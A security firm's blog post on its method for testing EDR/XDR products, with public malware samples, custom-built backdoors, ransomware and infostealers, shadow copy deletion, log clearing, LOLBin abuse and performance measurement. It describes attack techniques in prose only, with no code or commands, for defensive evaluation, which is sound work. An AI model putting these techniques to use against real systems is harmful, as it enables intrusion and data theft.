There is a growing landscape of security products promising to protect an organization’s IT infrastructure from attacks. Solutions referred to as EDR, and sometimes also as XDR, are designed to protect endpoints from all malicious activity. The ever-increasing cases of breaches and the associated costs, especially in the realm of ransomware attacks, raise the question of whether there is more that can be done to add an additional layer to traditional endpoint protection concepts. That is why a customer of ours commissioned us to evaluate whether EDR supplementing solutions provide extended protection against ever-evolving threats, as well as to shine a light on the performance overheads those solutions might introduce.

This blog post describes the methodology we use to evaluate and compare different EDR solutions for our customers. Given the growing number of sophisticated attacks, it is important not only to look at detection rates in isolation but to assess how these solutions perform under realistic conditions.

To achieve this, we combine tests with publicly known malware and custom-developed samples, simulate real-world attack scenarios, and analyze how each solution responds at different stages of an attack. In addition, we measure the performance impact on typical user activities to understand the trade-offs between security and usability.

The goal of this approach is to provide a structured, transparent, and practical basis for comparing EDR solutions and supplementing solutions to support informed decisions in real-world deployments.

Test Setup

To test the security products and their combination, the test setup comprises multiple virtual machines. Each virtual machine has an identical base configuration, but individual protection solutions are installed on each. Additionally, snapshots of the virtual machines are created to enable rollbacks to a clean, uniform starting point. This is especially important since malware will be placed on the systems. The configurations of the EDR solutions are performed in accordance with customer-specific guidelines and settings.

To create a realistic test environment, a collection of clean test files is placed in the user directories to simulate a normal workstation. Those test files comprise more than 100 files of various types and sizes, totaling over a gigabyte of data. Moreover, a normal usage history is created to thwart potential anti-forensic measures that may be implemented within the malware. The created usage history includes placing files in the Windows trash bin, creating browser history, downloading files, and saving browser credentials. Saved browser credentials are a popular target for malware, and an EDR protection solution might monitor malicious access to this sensitive data.

Methodology

To achieve the best possible coverage against a wide, realistic range of threats, the efficacy of the different EDR solutions and their combination was tested against both publicly known malware samples and custom-made malicious software.

Methodology for Publicly Known Malware

As the name publicly known malware suggests, the tested malware samples in this part of the test should be detected by all EDR protection solutions. However, this needs to be verified. The goal is to check whether quantitative differences exist between the tested EDR solutions. To handle the large number of malware samples within the limited time frame, both the testing procedure and result analysis are automated as much as possible.

There are various collections of publicly known malware. Such collections consist of samples in different file formats and sizes, and often several thousand new samples are added each month. Since most malware collections also include Linux samples, such as ELF files or bash scripts (which will not run on Windows systems), these files, which are obviously targeting other systems, are removed from the dataset. From the remaining files, a subset is selected for the tests.

To test the detection of publicly known malware samples, a script downloads each sample via HTTPS from one of our web servers to the test machine and saves it in a folder on the user’s desktop. When the file type of a sample cannot be automatically detected, the file is saved in multiple copies with different file extensions (e.g., bat, ps1, vbs). To verify whether the installed EDR protection solutions removed the malicious sample after download, the automation script first attempts to access the sample via a file read. If the file is still present, the automation script simulates a user double-clicking the file in Windows Explorer in the next step (e.g., .exe files are executed, .pdf files are opened in the default PDF viewer, etc.).

The results of those tests are logged together with relevant information collected from the Windows event logs.

Methodology for Custom Malware

The detection of custom-made malware samples is a difficult task for EDR solutions and, therefore, is most important for comparing their performance. For this reason, we create custom malware samples for these tests. Naturally, the custom-built malware samples are far fewer than the large collections of publicly known malware. Therefore, neither the execution nor the evaluation needs to rely on automation to test the collection of custom samples. Every sample is executed by an analyst via an RDP session on the test machines, and the results are manually recorded.

The standard procedure here looks like this:

The test system is booted from a clean snapshot. This way, we can guarantee that no test is ‘contaminated’ by residue from previous tests.
The sample is loaded onto the system. While this can be done in multiple ways, the two most practical variants are downloading via a web browser or a command-line tool like curl. The difference here might matter for the detection process, depending on how a defensive system is designed:
- A defensive system might insert a hook into the browser’s download process and automatically trigger a scan of all downloads, similar to Defender’s SmartScreen.
- Currently, curl does not create Zone.Identifier ADS for downloaded files. These markers make files downloaded from the web easily recognizable, and this might influence how a defense system handles them.
In the next step, the sample is executed. This can happen in a variety of ways: by a simple double-click, by a right-click and Run as administrator, from a cmd.exe or PowerShell session, and more. And again, the difference might matter, since a security system could include the privileges and parent process of a process in its verdict.
There is a possibility that user interaction is required during execution. The most common variant is the Windows Security message “This content is blocked”, which is commonly created by the attack surface reduction (ASR) rule “Block executable files from running unless they meet a prevalence, age, or trusted list criteria”. It should be decided in advance how to handle these. We usually follow the rule: “If there is any direct, user accessible button with Allow, Unblock, or Proceed, we will click it.”

Some tests are designed in multiple stages. For example, some samples communicate with a command-and-control (C2) server to receive commands. Such samples are designed so that commands start harmlessly and escalate over time. During the initial start of the malware, the C2 server does not send any commands. In a second step, the C2 server sends the malware a harmless command (e.g., printing a string to the console or displaying a message box), which is executed on the target system. In the third stage, the C2 server instructs the malware to download and execute an additional file, and so forth. Each step is designed to be more aggressive, more openly malicious, and easier to detect than the previous step. After each step, it can be checked if a specific command triggered any alerts or was blocked.

All these practices come together to form a methodology designed to mimic real-world conditions (both in operations and the threat landscape) as closely as possible, ensuring that the results are representative of practical operations. The goal is to enable valid predictions of real-world performance by systematically evaluating the systems under conditions representative of real-world threat behavior.

Custom Malware Samples

As described above, several custom, previously unknown malware samples are created to test the EDR solutions’ ability to detect previously unseen malicious samples. Since those samples are specifically created for a single assessment, a simple signature check will not catch them, and more advanced methods are required to detect and stop the custom malware samples. For all custom malware, we used a mix of compiled and interpreted programming languages. The following different malware types are created:

Backdoors: During preparation, several custom backdoor designs are created. A backdoor for the sake of this text is any kind of software designed to give attackers hidden, persistent access to a system. The backdoors incorporate several different features and C2 channels and are written in different programming languages.

Ransomware: Nowadays, ransomware is one of the most common types of malware. It encrypts local files, making them unusable for the user. To decrypt the files, a ransom needs to be paid to obtain the decryption key from the attackers. A selection of custom ransomware samples is created that use a variety of designs and algorithms to cover the entire spectrum of potential new ransomware variants.

Infostealer: Infostealers are a type of malware designed specifically to secretly collect sensitive information from a device and send it to the attackers. This might be a goal on its own (e.g., stealing credentials) or part of a larger attack (e.g., a ransomware attack in which files are extracted before encryption, adding another layer to the extortion). To simulate both cases, two custom malware samples are created. The first sample extracts the credentials from the web browser and uploads them to the attackers. The second sample tries to upload as many user files as possible from the system to the attackers.

Malicious Documents: Malicious access to a computer is often gained through a malicious email with an attached document. Once the user opens the malicious attachment, the system is infected. However, opening the document often prompts the user to accept warnings. Multiple documents are created to simulate such an attack and identify the EDR’s behavior on unseen samples of this malware type.

Malicious Actions and Behavior

Not everything malicious is a file. For this reason, we also test for various malicious actions and behavior patterns commonly observed in attacks.

Shadow Copy Deletion: In modern Windows versions, the Volume Shadow Copy Service (VSS) automatically creates backup snapshots (shadow copies) of files and the system state. Such shadow copies allow restoring previous versions of files or system rollbacks after a failed upgrade attempt. As such, they are almost the natural enemy of ransomware: after a ransomware attack, these copies are often the fastest way to recover encrypted files without paying ransom, provided they still exist. Naturally, shadow copy deletion is a common step in ransomware attacks to prevent victims from restoring their files on their own. We therefore test various ways to delete (or otherwise disable) shadow copies and check whether the evaluated security solution can detect and prevent such behavior.

Event Log Clearing: Attackers often clear Windows event logs as part of their post-compromise activity to cover their traces. Event logs in Windows are a critical source of forensic information, and erasing or tampering with them helps attackers complicate detection. We therefore also check if deleting the event logs is prevented or triggers any alerts.

Malicious PowerShell Scripts: PowerShell scripts are a useful tool for both admins and attackers alike. We therefore test how well the defensive system reacts when malicious PowerShell scripts are loaded, whether from a file, a URL, or pasted into the console.

Unusual Resource Consumption: Cryptominer malware (a.k.a. cryptojackers) is designed to secretly use a victim’s CPU or GPU to mine cryptocurrency (e.g., Bitcoin or Monero). While implementations vary, some traits are hard to avoid: a cryptominer needs to connect to a server to fetch the task to compute, compute it (often utilizing all available resources), and send the results back (if it was successful). For our test, we use a simulated cryptominer: it loads a value from the web server and executes 1,000,000 SHA-256 operations with it, using the output of the last hashing operation as input to the next. This is done in as many parallel processes as there are CPU cores available. The rationale here is to check whether the solution, in any way, flags an application with this behavior.

LOLBins: LOLBins (Living-Off-the-Land Binaries) are legitimate executables already present on a system that attackers abuse to perform malicious actions without dropping new files. The concept stems from the broader technique of Living off the Land, in which attackers rely on built-in tools to blend in with normal system activity. For this reason, we test the abuse of different LOLBins and check whether any protection system intervenes.

Performance Testing

In addition to tests with public and custom malware samples, the protection solutions are also evaluated regarding their performance impact on everyday workloads. For this purpose, the time required to open test files of various types, launch applications, and copy data is measured. Each workload is tested multiple times, according to the determined sample size, with a cooldown period in between.

The resulting measurement data set is cleaned of outliers to prevent distortions. After that, the arithmetic mean is calculated for each workload and for all measurements with the respective protection solution applied. The latter is compared to a baseline system with no active EDR to determine the average overhead of each protection solution.

Evaluation

While custom malware samples are evaluated manually, the significantly larger set of publicly known samples requires an automated approach.

For this purpose, data from multiple sources is correlated: endpoint logs, cloud-based telemetry provided by the respective solutions, and logs generated by the automation framework during testing. By combining these sources, it is possible to systematically identify events related to each tested sample.

This approach allows us to determine whether a sample was detected, at which stage (e.g., during download, on access, or upon execution), and which component of the EDR solution was responsible for the detection.

Conclusion

EDR and XDR solutions are key components of modern security architectures, providing valuable capabilities for detecting and mitigating attacks. However, their deployment alone does not guarantee improved security. Effectiveness depends on factors such as configuration, integration, and the organization’s specific threat model.

The same product can yield very different results depending on its implementation and the defender’s objectives. This makes practical evaluation essential and often yields surprising results!

Only through such testing can organizations determine whether a product meaningfully strengthens their defenses or provides only limited value in real-world scenarios. For those of you looking to validate your current setup, explore new tools, or meet compliance requirements such as #DORA, feel free to reach out to us for a thorough EDR assessment: https://ernw-research.de/en/contact.html.

Cheers!

Justus, Nils, Lucas & Gregor

Assessing Endpoint Protection: Our Approach to EDR/XDR and Supplements Evaluation